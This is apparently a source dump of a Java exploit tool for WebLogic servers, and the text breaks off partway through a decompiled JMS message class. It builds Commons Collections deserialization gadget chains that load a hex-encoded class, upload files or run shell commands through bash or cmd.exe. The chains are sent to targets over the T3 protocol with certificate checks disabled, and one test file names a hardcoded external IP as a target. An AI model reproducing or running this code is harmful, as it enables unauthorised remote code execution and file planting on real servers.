696f2f496e70757453747265616d3b2956010013284c6a6176612f696f2f5265616465723b2956010008726561644c696e65010006617070656e6401002c284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e674275666665723b010008746f537472696e6701000a6765744d6573736167650021000200350001003600000005000100370038000100390000002f00010001000000052ab70001b100000002003a00000006000100000015003b0000000c000100000005003c003d00000009003e003f00010039000000f90003000300000061bb000259b700034c2abe05a000192a03321204b6000599000e2b2a0432b6000657a7003b2abe04a00035bb000759b700084d2a03321209b6000599000f2c120a2bb9000b0300a700162a0332120cb6000599000b2c120ab9000d0200a700044cb100010000005c005f000e0003003a00000032000c0000001a0008001c0019001d0024001e002a001f00320020003d00210049002200540023005c0028005f002600600029003b0000002a00040032002a004000410002000800540042003d000100600000004300440001000000610045004600000047000000160005fc0024070048fc0024070049f900124207004a000001004b004c000200390000003f0000000300000001b100000002003a0000000600010000002f003b00000020000300000001003c003d000000000001004d004e0001000000010045004e0002004f00000004000100500009005100520001003900000090000300030000001bbb000f592ab700104d2c2bb600112cb600122cb60013a700044db10001000000160019000e0003003a0000001e00070000003300090034000e0035001200360016003900190037001a003a003b0000002a00040009000d005300540002001a00000043004400020000001b0055004e00000000001b00560057000100470000000700025907004a0000010058005900020039000002540005000a000000ee2b1214b600159a00061216b02b100ab600174c043d1218b800194e2dc600112db6001a121bb6001c990005033dbb001d59b7001e3a042b121fb6001599001319042b07b60017b90020020057a700441c99002319041221b9002002005719041222b9002002005719042bb90020020057a7002019041223b9002002005719041224b9002002005719042bb90020020057bb0025591904b700263a05190504b60027571905b600283a06bb002959bb002a591906b6002bb7002cb7002d3a07bb002e59b7002f3a081907b60030593a09c6001319081909b600311232b6003157a7ffe81908b60033b04d2cb60034b000020000000b00e8000e000c00e700e8000e0004003a0000006e001b0000004100090042000c00440013004700150048001b0049002b004a002d004d0036004f003f0050004f005100530052005d00530067005400730056007d0057008700580090005b009b005c00a2005d00a9005f00be006000c7006300d2006400e2006700e8006800e90069003b00000070000b001500d3005a005b0002001b00cd005c004e0003003600b2005d005e0004009b004d005f0060000500a9003f00610062000600be002a00630064000700c7002100650066000800cf00190067004e000900e90005004300440002000000ee003c003d0000000000ee004d004e000100680000000c0001003600b2005d0069000400470000004800080cfd00200107006afc002107006b231cff0036000907004807006a0107006a07006b07006c07006d07006e07006f0000fc001a07006aff0005000207004807006a000107004a004f000000040001005000010070000000020071";
private static byte[] serialData(Transformer[] transformers) throws Exception {
final Transformer transformerChain = new ChainedTransformer(transformers);
final Map innerMap = new HashMap();
// 初始化map 设置laymap
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
InvocationHandler handler = (InvocationHandler) Reflections
.getFirstCtor(
"sun.reflect.annotation.AnnotationInvocationHandler")
.newInstance(Override.class, lazyMap);
final Map mapProxy = Map.class
.cast(Proxy.newProxyInstance(SerialDataGenerator.class.getClassLoader(),
new Class[]{Map.class}, handler));
handler = (InvocationHandler) Reflections.getFirstCtor(
"sun.reflect.annotation.AnnotationInvocationHandler")
.newInstance(Override.class, mapProxy);
Object _handler = BypassPayloadSelector.selectBypass(handler);
return Serializables.serialize(_handler);
}
private static Transformer[] defineAndLoadPayloadTransformerChain(String className, byte[] clsData, String[] bootArgs) throws Exception {
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(DefiningClassLoader.class),
new InvokerTransformer("getDeclaredConstructor", new Class[]{Class[].class}, new Object[]{new Class[0]}),
new InvokerTransformer("newInstance", new Class[]{Object[].class}, new Object[]{new Object[0]}),
new InvokerTransformer("defineClass",
new Class[]{String.class, byte[].class}, new Object[]{className, clsData}),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"main", new Class[]{String[].class}}),
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[]{bootArgs}}),
new ConstantTransformer(new HashSet())};
return transformers;
}
private static Transformer[] uploadTransformerChain(String className, byte[] clsData, String filePath, byte[] content) throws Exception {
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(DefiningClassLoader.class),
new InvokerTransformer("getDeclaredConstructor", new Class[]{Class[].class}, new Object[]{new Class[0]}),
new InvokerTransformer("newInstance", new Class[]{Object[].class}, new Object[]{new Object[0]}),
new InvokerTransformer("defineClass",
new Class[]{String.class, byte[].class}, new Object[]{className, clsData}),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"uploadFile", new Class[]{String.class, byte[].class}}),
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[]{filePath, content}}),
new ConstantTransformer(new HashSet())};
return transformers;
}
private static Transformer[] blindExecutePayloadTransformerChain(String[] execArgs) throws Exception {
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[]{
String.class, Class[].class}, new Object[]{
"getRuntime", new Class[0]}),
new InvokerTransformer("invoke", new Class[]{
Object.class, Object[].class}, new Object[]{
null, new Object[0]}),
new InvokerTransformer("exec",
new Class[]{String[].class}, new Object[]{execArgs}),
new ConstantTransformer(new HashSet())};
return transformers;
}
public static byte[] serialRmiDatas(String[] bootArgs) throws Exception {
return serialData(defineAndLoadPayloadTransformerChain(SerialDataGenerator.REMOTE, BytesOperation.hexStringToBytes(SerialDataGenerator.remoteHex), bootArgs));
}
public static byte[] serialBlindDatas(String[] execArgs) throws Exception {
return serialData(blindExecutePayloadTransformerChain(execArgs));
}
public static byte[] serialUploadDatas(String filePath, byte[] content) throws Exception {
return serialData(uploadTransformerChain(SerialDataGenerator.REMOTE, BytesOperation.hexStringToBytes(SerialDataGenerator.remoteHex), filePath, content));
}
}
================================================
FILE: src/com/supeream/serial/Serializables.java
================================================
package com.supeream.serial;
import java.io.*;
public class Serializables {
public static byte[] serialize(final Object obj) throws IOException {
final ByteArrayOutputStream out = new ByteArrayOutputStream();
serialize(obj, out);
return out.toByteArray();
}
public static void serialize(final Object obj, final OutputStream out) throws IOException {
final ObjectOutputStream objOut = new ObjectOutputStream(out);
objOut.writeObject(obj);
objOut.flush();
objOut.close();
}
public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException {
final ByteArrayInputStream in = new ByteArrayInputStream(serialized);
return deserialize(in);
}
public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException {
final ObjectInputStream objIn = new ObjectInputStream(in);
return objIn.readObject();
}
}
================================================
FILE: src/com/supeream/ssl/SocketFactory.java
================================================
package com.supeream.ssl;
import com.supeream.Main;
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSocketFactory;
import javax.net.ssl.TrustManager;
import java.net.Socket;
import java.security.SecureRandom;
/**
* Created by nike on 17/6/29.
*/
public class SocketFactory {
private SocketFactory() {
}
public static Socket newSocket(String host, int port) throws Exception {
Socket socket = null;
if (Main.cmdLine.hasOption("https")) {
SSLContext context = SSLContext.getInstance("SSL");
// 初始化
context.init(null,
new TrustManager[]{new TrustManagerImpl()},
new SecureRandom());
SSLSocketFactory factory = context.getSocketFactory();
socket = factory.createSocket(host, port);
} else {
socket = new Socket(host, port);
}
return socket;
}
}
================================================
FILE: src/com/supeream/ssl/TrustManagerImpl.java
================================================
package com.supeream.ssl;
import javax.net.ssl.X509TrustManager;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
/**
* Created by nike on 17/6/29.
*/
public class TrustManagerImpl implements X509TrustManager {
@Override
public void checkClientTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException {
}
@Override
public void checkServerTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException {
}
@Override
public X509Certificate[] getAcceptedIssuers() {
return null;
}
}
================================================
FILE: src/com/supeream/ssl/WeblogicTrustManager.java
================================================
package com.supeream.ssl;
import weblogic.security.SSL.TrustManager;
import java.security.cert.X509Certificate;
/**
* Created by nike on 17/6/29.
*/
public class WeblogicTrustManager implements TrustManager {
@Override
public boolean certificateCallback(X509Certificate[] x509Certificates, int i) {
return true;
}
}
================================================
FILE: src/com/supeream/weblogic/BypassPayloadSelector.java
================================================
package com.supeream.weblogic;
import com.supeream.Main;
import com.supeream.serial.Serializables;
import weblogic.corba.utils.MarshalledObject;
import weblogic.jms.common.StreamMessageImpl;
import java.io.IOException;
/**
* Created by nike on 17/6/26.
*/
public class BypassPayloadSelector {
private static Object marshalledObject(Object payload) {
MarshalledObject marshalledObject = null;
try {
marshalledObject = new MarshalledObject(payload);
} catch (IOException e) {
e.printStackTrace();
}
return marshalledObject;
}
public static Object streamMessageImpl(byte[] object) throws Exception {
StreamMessageImpl streamMessage = new StreamMessageImpl();
streamMessage.setDataBuffer(object, object.length);
return streamMessage;
}
public static Object selectBypass(Object payload) throws Exception {
if (Main.TYPE.equalsIgnoreCase("marshall")) {
payload = marshalledObject(payload);
} else if (Main.TYPE.equalsIgnoreCase("streamMessageImpl")) {
payload = streamMessageImpl(Serializables.serialize(payload));
}
return payload;
}
}
================================================
FILE: src/com/supeream/weblogic/ObjectTest.java
================================================
package com.supeream.weblogic;
import com.supeream.serial.BytesOperation;
import java.io.*;
/**
* Created by nike on 17/7/11.
*/
public class ObjectTest {
public static void main(String[] args) throws Exception {
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
objectOutputStream.writeUTF("xxx");
String xx = BytesOperation.bytesToHexString(byteArrayOutputStream.toByteArray());
System.out.println(xx);
byte[] cons = BytesOperation.hexStringToBytes(xx);
ByteArrayInputStream bis = new ByteArrayInputStream(cons);
ObjectInputStream objectInputStream = new ObjectInputStream(bis);
objectInputStream.readObject();
}
}
================================================
FILE: src/com/supeream/weblogic/T3ProtocolOperation.java
================================================
package com.supeream.weblogic;
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
import com.supeream.Main;
import com.supeream.serial.BytesOperation;
import com.supeream.serial.Serializables;
import com.supeream.ssl.SocketFactory;
import weblogic.rjvm.JVMID;
import weblogic.security.acl.internal.AuthenticatedUser;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.Socket;
public class T3ProtocolOperation {
public static void send(String host, String port, byte[] payload) throws Exception {
Socket s = SocketFactory.newSocket(host, Integer.parseInt(port));
//AS ABBREV_TABLE_SIZE HL remoteHeaderLength 用来做skip的
String header = "t3 7.0.0.0\nAS:10\nHL:19\n\n";
if (Main.cmdLine.hasOption("https")) {
header = "t3s 7.0.0.0\nAS:10\nHL:19\n\n";
}
s.getOutputStream().write(header.getBytes());
s.getOutputStream().flush();
BufferedReader br = new BufferedReader(new InputStreamReader(s.getInputStream()));
String versionInfo = br.readLine();
if (Main.version == null) {
versionInfo = versionInfo.replace("HELO:", "");
versionInfo = versionInfo.replace(".false", "");
System.out.println("weblogic version:" + versionInfo);
Main.version = versionInfo;
}
// String asInfo = br.readLine();
// String hlInfo = br.readLine();
// System.out.println(versionInfo+"\n"+asInfo+"\n"+hlInfo);
//cmd=1,QOS=1,flags=1,responseId=4,invokableId=4,abbrevOffset=4,countLength=1,capacityLength=1
//t3 protocol
String cmd = "08";
String qos = "65";
String flags = "01";
String responseId = "ffffffff";
String invokableId = "ffffffff";
String abbrevOffset = "00000000";
String countLength = "01";
String capacityLength = "10";//必须大于上面设置的AS值
String readObjectType = "00";//00 object deserial 01 ascii
StringBuilder datas = new StringBuilder();
datas.append(cmd);
datas.append(qos);
datas.append(flags);
datas.append(responseId);
datas.append(invokableId);
datas.append(abbrevOffset);
//because of 2 times deserial
countLength = "04";
datas.append(countLength);
//define execute operation
String pahse1Str = BytesOperation.bytesToHexString(payload);
datas.append(capacityLength);
datas.append(readObjectType);
datas.append(pahse1Str);
//for compatiable fo hide
//for compatiable fo hide
AuthenticatedUser authenticatedUser = new AuthenticatedUser("weblogic", "admin123");
String phase4 = BytesOperation.bytesToHexString(Serializables.serialize(authenticatedUser));
datas.append(capacityLength);
datas.append(readObjectType);
datas.append(phase4);
JVMID src = new JVMID();
Constructor constructor = JVMID.class.getDeclaredConstructor(java.net.InetAddress.class,boolean.class);
constructor.setAccessible(true);
src = (JVMID)constructor.newInstance(InetAddress.getByName("127.0.0.1"),false);
Field serverName = src.getClass().getDeclaredField("differentiator");
serverName.setAccessible(true);
serverName.set(src,1);
datas.append(capacityLength);
datas.append(readObjectType);
datas.append(BytesOperation.bytesToHexString(Serializables.serialize(src)));
JVMID dst = new JVMID();
constructor = JVMID.class.getDeclaredConstructor(java.net.InetAddress.class,boolean.class);
constructor.setAccessible(true);
src = (JVMID)constructor.newInstance(InetAddress.getByName("127.0.0.1"),false);
serverName = src.getClass().getDeclaredField("differentiator");
serverName.setAccessible(true);
serverName.set(dst,1);
datas.append(capacityLength);
datas.append(readObjectType);
datas.append(BytesOperation.bytesToHexString(Serializables.serialize(dst)));
byte[] headers = BytesOperation.hexStringToBytes(datas.toString());
int len = headers.length + 4;
String hexLen = Integer.toHexString(len);
StringBuilder dataLen = new StringBuilder();
if (hexLen.length() < 8) {
for (int i = 0; i < (8 - hexLen.length()); i++) {
dataLen.append("0");
}
}
dataLen.append(hexLen);
s.getOutputStream().write(BytesOperation.hexStringToBytes(dataLen + datas.toString()));
s.getOutputStream().flush();
s.close();
}
}
================================================
FILE: src/com/supeream/weblogic/T3Test.java
================================================
package com.supeream.weblogic;
import com.supeream.Main;
import com.supeream.payload.RemoteImpl;
import com.supeream.serial.BytesOperation;
import com.supeream.serial.SerialDataGenerator;
import com.supeream.serial.Serializables;
import com.supeream.ssl.SocketFactory;
import org.apache.commons.cli.CommandLineParser;
import org.apache.commons.cli.DefaultParser;
import org.apache.commons.cli.Options;
import weblogic.apache.org.apache.velocity.runtime.Runtime;
import weblogic.cluster.singleton.ClusterMasterRemote;
import weblogic.jndi.internal.NamingNode;
import weblogic.protocol.Identity;
import weblogic.rjvm.JVMID;
import weblogic.rmi.cluster.ClusterableRemoteObject;
import weblogic.rmi.cluster.ReplicaAwareRemoteObject;
import weblogic.security.acl.internal.AuthenticatedUser;
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingEnumeration;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.net.Inet4Address;
import java.net.InetAddress;
import java.net.Socket;
import java.rmi.Remote;
/**
* Created by nike on 17/6/28.
*/
public class T3Test {
public static void main(String[] args) throws Exception {
// Options options = new Options();
// options.addOption("https",false,"xx");
// CommandLineParser parser = new DefaultParser();
// Main.cmdLine = parser.parse(options, args);
//
// Socket s = SocketFactory.newSocket("77.246.34.226", 443);
// //AS ABBREV_TABLE_SIZE HL remoteHeaderLength 用来做skip的
// String header = "t3 7.0.0.0\nAS:10\nHL:19\n\n";
// s.getOutputStream().write(header.getBytes());
// s.getOutputStream().flush();
// BufferedReader br = new BufferedReader(new InputStreamReader(s.getInputStream()));
// String versionInfo = br.readLine();
// String asInfo = br.readLine();
// String hlInfo = br.readLine();
//
// System.out.println(versionInfo + "\n" + asInfo + "\n" + hlInfo);
//
// //cmd=1,QOS=1,flags=1,responseId=4,invokableId=4,abbrevOffset=4,countLength=1,capacityLength=1
//
//
// //t3 protocol
// String cmd = "09";
// String qos = "65";
// String flags = "01";
// String responseId = "ffffffff";
// String invokableId = "ffffffff";
// String abbrevOffset = "00000022";//16+3=19+4+4+1=28+1+1+5348=5378-4=000014fe 30+8-4
//
//
// String countLength = "02";
// String capacityLength = "10";//必须大于上面设置的AS值
// String readObjectType = "00";//00 object deserial 01 ascii
//
// StringBuilder dataS = new StringBuilder();
// dataS.append(cmd);
// dataS.append(qos);
// dataS.append(flags);
// dataS.append(responseId);
// dataS.append(invokableId);
// dataS.append(abbrevOffset);
//
// //RemotePeriodLength
// dataS.append("00000001");
// //PublickeySize
// dataS.append("00000001");
// System.out.println(Integer.toHexString(115));
// dataS.append("0001");
//
// byte[] phase1 = Serializables.serialize(new File("/etc/passwd"));
// System.out.println("payloadlength="+(phase1.length));
// String pahse1Str = BytesOperation.bytesToHexString(phase1);
// System.out.println("pahse1Str="+pahse1Str);
// dataS.append(pahse1Str.substring(8));
//
// countLength = "04";
// dataS.append(countLength);
//
//
// //define IRemote.class class by byte[]
//// byte[] phase1 = SerialDataGenerator.serialRmiDatas(new String[]{"install"});
//// String pahse1Str = BytesOperation.bytesToHexString(phase1);
//// datas.append(capacityLength);
//// datas.append(readObjectType);
//// datas.append(pahse1Str);
//
//
//
// //for compatiable fo hide
// Class x = Class.forName("weblogic.rjvm.ClassTableEntry");
//
// Class xxf = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
// ObjectStreamClass objectStreamClass = ObjectStreamClass.lookup(xxf);
// Constructor f = x.getDeclaredConstructor(ObjectStreamClass.class, String.class);
//
// f.setAccessible(true);
// Object xx = f.newInstance(objectStreamClass,"");
//
// String phase41 = BytesOperation.bytesToHexString(Serializables.serialize(xx));
// dataS.append(capacityLength);
// dataS.append(readObjectType);
// dataS.append(phase41);
//
//
// //for compatiable fo hide
// AuthenticatedUser authenticatedUser = new AuthenticatedUser("weblogic", "admin123");
// String phase4 = BytesOperation.bytesToHexString(Serializables.serialize(authenticatedUser));
// dataS.append(capacityLength);
// dataS.append(readObjectType);
// dataS.append(phase4);
//
// JVMID dst = new JVMID();
//
// Constructor constructor = JVMID.class.getDeclaredConstructor(java.net.InetAddress.class,boolean.class);
// constructor.setAccessible(true);
// dst = (JVMID)constructor.newInstance(InetAddress.getByName("127.0.0.1"),false);
// Field serverName = dst.getClass().getDeclaredField("differentiator");
// serverName.setAccessible(true);
// serverName.set(dst,0);
//
// serverName = dst.getClass().getDeclaredField("transientIdentity");
// serverName.setAccessible(true);
// serverName.set(dst,new Identity(1000l));
//
// dataS.append(capacityLength);
// dataS.append(readObjectType);
// dataS.append(BytesOperation.bytesToHexString(Serializables.serialize(dst)));
//
// JVMID src = new JVMID();
//
// constructor = JVMID.class.getDeclaredConstructor(java.net.InetAddress.class,boolean.class);
// constructor.setAccessible(true);
// src = (JVMID)constructor.newInstance(InetAddress.getByName("127.0.0.1"),false);
// serverName = src.getClass().getDeclaredField("differentiator");
// serverName.setAccessible(true);
// serverName.set(dst,0);
//
// serverName = src.getClass().getDeclaredField("transientIdentity");
// serverName.setAccessible(true);
// serverName.set(src,new Identity(1000l));
//
// dataS.append(capacityLength);
// dataS.append(readObjectType);
// dataS.append(BytesOperation.bytesToHexString(Serializables.serialize(src)));
//
//
//
//// RemotePeriodLength
// int remotePeriodLength = Integer.MAX_VALUE;
// ByteArrayOutputStream bos = new ByteArrayOutputStream();
// DataOutputStream dos = new DataOutputStream(bos);
// dos.writeInt(remotePeriodLength);
// dos.flush();
// dos.close();
// System.out.println(BytesOperation.bytesToHexString(bos.toByteArray()));
//
// System.out.println(dataS.toString());
//
// byte[] headers = BytesOperation.hexStringToBytes(dataS.toString());
//
//
// int len = headers.length + 4;
// String hexLen = Integer.toHexString(len);
//
// StringBuilder dataLen = new StringBuilder();
// if (hexLen.length() < 8) {
// for (int i = 0; i < (8 - hexLen.length()); i++) {
// dataLen.append("0");
// }
// }
//
// dataLen.append(hexLen);
// System.out.println("length="+dataLen);
//
// s.getOutputStream().write(BytesOperation.hexStringToBytes(dataLen + dataS.toString()));
// s.getOutputStream().flush();
//
// System.out.println("result="+br.readLine());
// s.close();
System.setProperty("weblogic.rjvm.enableprotocolswitch","true");
System.setProperty("UseSunHttpHandler","true");
System.setProperty("ssl.SocketFactory.provider" , "sun.security.ssl.SSLSocketFactoryImpl");
System.setProperty("ssl.ServerSocketFactory.provider" , "sun.security.ssl.SSLSocketFactoryImpl");
Context initialContext = Main.getInitialContext("t3s://" + "77.246.34.226" + ":" + 443);
// Context initialContext = Main.getInitialContext("t3://" + "10.211.55.5" + ":" + 7001);
// NamingNode remote = (NamingNode) initialContext.lookup("weblogic");
// System.out.println(remote.toString());
// System.out.println(initialContext.);
System.out.println(initialContext.getEnvironment());
NamingEnumeration namingEnumeration = initialContext.list("");
while (namingEnumeration.hasMoreElements()) {
System.out.println(namingEnumeration.next().getClass().getName());
}
// weblogic.jndi.internal.WLContextImpl serverNamingNode = (weblogic.jndi.internal.WLContextImpl) initialContext.lookup("weblogic");
}
}
================================================
FILE: src/com/supeream/weblogic/WebLogicOperation.java
================================================
package com.supeream.weblogic;
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
import com.supeream.Main;
import com.supeream.serial.SerialDataGenerator;
import com.supeream.serial.Serializables;
public class WebLogicOperation {
public static void installRmi(String host, String port) throws Exception {
byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"install"});
T3ProtocolOperation.send(host, port, payload);
}
public static void unInstallRmi(String host, String port) throws Exception {
byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"uninstall"});
T3ProtocolOperation.send(host, port, payload);
}
public static void blind(String host, String port) throws Exception {
byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"blind", Main.cmdLine.getOptionValue("C")});
T3ProtocolOperation.send(host, port, payload);
}
public static void uploadFile(String host, String port, String filePath, byte[] content) throws Exception {
byte[] payload = SerialDataGenerator.serialUploadDatas(filePath, content);
T3ProtocolOperation.send(host, port, payload);
}
public static void blindExecute(String host, String port, String cmd) throws Exception {
String[] cmds = new String[]{cmd};
if (Main.cmdLine.hasOption("os")) {
if (Main.cmdLine.getOptionValue("os").equalsIgnoreCase("linux")) {
cmds = new String[]{"/bin/bash", "-c", cmd};
} else {
cmds = new String[]{"cmd.exe", "/c", cmd};
}
}
byte[] payload = SerialDataGenerator.serialBlindDatas(cmds);
T3ProtocolOperation.send(host, port, payload);
}
}
================================================
FILE: src/weblogic/jms/common/StreamMessageImpl.java
================================================
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
package weblogic.jms.common;
import weblogic.jms.JMSClientExceptionLogger;
import javax.jms.Destination;
import javax.jms.JMSException;
import javax.jms.MessageEOFException;
import javax.jms.MessageNotWriteableException;
import javax.jms.*;
import java.io.*;
public final class StreamMessageImpl extends MessageImpl implements StreamMessage, Externalizable {
static final long serialVersionUID = 7748687583664395357L;
private static final byte EXTVERSION1 = 1;
private static final byte EXTVERSION2 = 2;
private static final byte EXTVERSION3 = 3;
private static final byte VERSIONMASK = 127;
private static final byte UNKNOWN_TYPECODE = 0;
private static final byte BOOLEAN_TYPE = 1;
private static final byte BYTE_TYPE = 2;
private static final byte CHAR_TYPE = 3;
private static final byte DOUBLE_TYPE = 4;
private static final byte FLOAT_TYPE = 5;
private static final byte INT_TYPE = 6;
private static final byte LONG_TYPE = 7;
private static final byte SHORT_TYPE = 8;
private static final byte STRING_UTF_TYPE = 9;
private static final byte STRING_UTF32_TYPE = 10;
private static final byte BYTES_TYPE = 11;
private static final byte NULL_TYPE = 12;
private static final String[] TYPE_CODE_STRINGS = new String[]{"invalid type code", "boolean", "byte", "char", "double", "float", "integer", "long", "short", "String", "String", "byte array", "null object"};
private static final String ERROR_MSG_SEGMENT = ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage";
private boolean readingByteArray;
private int available_bytes;
private transient byte[] buffer;
private transient int length;
private transient boolean copyOnWrite;
private transient BufferDataOutputStream bdos;
private transient BufferDataInputStream bdis;
public StreamMessageImpl() {
}
public StreamMessageImpl(StreamMessage var1) throws IOException, JMSException {
this(var1, (Destination) null, (Destination) null);
}
public StreamMessageImpl(StreamMessage var1, Destination var2, Destination var3) throws IOException, JMSException {
super(var1, var2, var3);
if (!(var1 instanceof StreamMessageImpl)) {
var1.reset();
}
try {
while (true) {
this.writeObject(var1.readObject());
}
} catch (MessageEOFException var5) {
this.reset();
this.setPropertiesWritable(false);
}
}
public byte getType() {
return 5;
}
public void nullBody() {
this.length = 0;
this.buffer = null;
this.copyOnWrite = false;
this.bdis = null;
this.bdos = null;
this.readingByteArray = false;
this.available_bytes = 0;
}
private void putTypeBack() {
if (!this.readingByteArray) {
this.bdis.unput();
}
}
private String readPastEnd() {
return JMSClientExceptionLogger.logReadPastEndLoggable().getMessage();
}
private String streamReadError() {
return JMSClientExceptionLogger.logStreamReadErrorLoggable().getMessage();
}
private String streamWriteError() {
return JMSClientExceptionLogger.logStreamWriteErrorLoggable().getMessage();
}
private String streamConversionError(String var1, String var2) {
return JMSClientExceptionLogger.logConversionErrorLoggable(var1, var2).getMessage();
}
private byte readType() throws JMSException {
this.decompressMessageBody();
this.checkReadable();
if (this.readingByteArray) {
return 11;
} else {
try {
return this.bdis.readByte();
} catch (EOFException var2) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var2);
} catch (IOException var3) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var3);
}
}
}
private void writeType(byte var1) throws JMSException {
this.checkWritable();
try {
this.bdos.writeByte(var1);
} catch (IOException var3) {
throw new weblogic.jms.common.JMSException(JMSClientExceptionLogger.logStreamWriteErrorLoggable().getMessage(), var3);
}
}
public boolean readBoolean() throws JMSException {
byte var1 = this.readType();
try {
switch (var1) {
case 1:
return this.bdis.readBoolean();
case 9:
case 10:
return Boolean.valueOf(this.readStringInternal(var1)).booleanValue();
default:
this.putTypeBack();
String var2 = "";
if (this.readingByteArray) {
var2 = ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage";
}
throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(var1), this.typeCodeToString(1)) + var2);
}
} catch (EOFException var3) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var3);
} catch (IOException var4) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var4);
}
}
public byte readByte() throws JMSException {
byte var1 = this.readType();
try {
switch (var1) {
case 2:
return this.bdis.readByte();
case 9:
case 10:
this.bdis.mark();
return Byte.parseByte(this.readStringInternal(var1));
default:
this.putTypeBack();
String var2 = "";
if (this.readingByteArray) {
var2 = ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage";
}
throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(var1), this.typeCodeToString(2)) + var2);
}
} catch (EOFException var3) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var3);
} catch (IOException var4) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var4);
} catch (NumberFormatException var5) {
this.bdis.backToMark();
this.bdis.unput();
throw var5;
}
}
public short readShort() throws JMSException {
byte var1 = this.readType();
try {
switch (var1) {
case 2:
return (short) this.bdis.readByte();
case 3:
case 4:
case 5:
case 6:
case 7:
default:
this.putTypeBack();
String var2 = "";
if (this.readingByteArray) {
var2 = ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage";
}
throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(var1), this.typeCodeToString(8)) + var2);
case 8:
return this.bdis.readShort();
case 9:
case 10:
this.bdis.mark();
return Short.parseShort(this.readStringInternal(var1));
}
} catch (EOFException var3) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var3);
} catch (IOException var4) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var4);
} catch (NumberFormatException var5) {
this.bdis.backToMark();
this.bdis.unput();
throw var5;
}
}
public char readChar() throws JMSException {
byte var1 = this.readType();
try {
switch (var1) {
case 3:
return this.bdis.readChar();
case 12:
this.putTypeBack();
throw new NullPointerException();
default:
this.putTypeBack();
String var2 = "";
if (this.readingByteArray) {
var2 = ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage";
}
throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(var1), this.typeCodeToString(3)) + var2);
}
} catch (EOFException var3) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var3);
} catch (IOException var4) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var4);
}
}
public int readInt() throws JMSException {
byte var1 = this.readType();
try {
switch (var1) {
case 2:
return this.bdis.readByte();
case 3:
case 4:
case 5:
case 7:
default:
this.putTypeBack();
String var2 = "";
if (this.readingByteArray) {
var2 = ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage";
}
throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(var1), this.typeCodeToString(6)) + var2);
case 6:
return this.bdis.readInt();
case 8:
return this.bdis.readShort();
case 9:
case 10:
this.bdis.mark();
return Integer.parseInt(this.readStringInternal(var1));
}
} catch (EOFException var3) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var3);
} catch (IOException var4) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var4);
} catch (NumberFormatException var5) {
this.bdis.backToMark();
this.bdis.unput();
throw var5;
}
}
public long readLong() throws JMSException {
byte var1 = this.readType();
try {
switch (var1) {
case 2:
return (long) this.bdis.readByte();
case 3:
case 4:
case 5:
default:
this.putTypeBack();
String var2 = "";
if (this.readingByteArray) {
